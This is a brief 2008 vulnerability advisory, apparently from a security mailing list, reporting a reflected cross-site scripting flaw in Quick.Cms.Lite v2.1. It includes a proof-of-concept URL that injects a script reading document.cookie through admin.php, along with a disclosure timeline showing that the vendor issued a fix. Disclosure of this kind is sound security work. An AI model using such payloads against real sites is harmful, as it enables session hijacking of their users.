[NOBYTES.COM: #14] Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting Sep 16 2008 09:15PM
John Cobb (johnc nobytes com)
Application: Quick.Cms.Lite v2.1 Freeware
Authors Site: http://opensolution.org/quick.cms,en,10.html

+--------------------------------------------------------------+

XSS:

http://www.victim.com/admin.php?"><script>alert(document.cookie)</script
><"

+-[Notes:]-----------------------------------------------------+

This only appears to work on Internet Explorer.

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: 16/09/2008

JohnC (at) NoBytes (dot) com [email concealed]

http://www.NoBytes.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus